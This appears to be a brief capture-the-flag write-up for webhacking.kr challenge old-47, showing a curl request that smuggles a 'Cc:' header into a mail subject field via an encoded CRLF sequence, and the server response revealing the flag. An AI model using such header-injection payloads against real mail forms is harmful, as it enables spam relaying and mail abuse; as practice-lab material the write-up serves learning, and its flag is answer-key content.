old-47 -- Mail Header Injection
➜ curl "https://webhacking.kr/challenge/bonus-11/" `
> -H "Cookie: PHPSESSID=3052403292" `
> -H "Referer: https://webhacking.kr/challenge/bonus-11/" `
> -d "subject=Flag+of+webhacking.kr+old-47+chall%0D%0ACc: rasosa7682@lucvu.com"
<html>
<head>
<title>Challenge 47</title>
</head>
<body>
<form method=post name=mailfrm>
Mail subject : <input type=text name=subject size=50 value="Flag of webhacking.kr old-47 chall" maxlength=50><input type=submit value=send>
</form>
<hr>Mail has been sent<hr>FLAG{wasted_too_much_time_damn}Last updated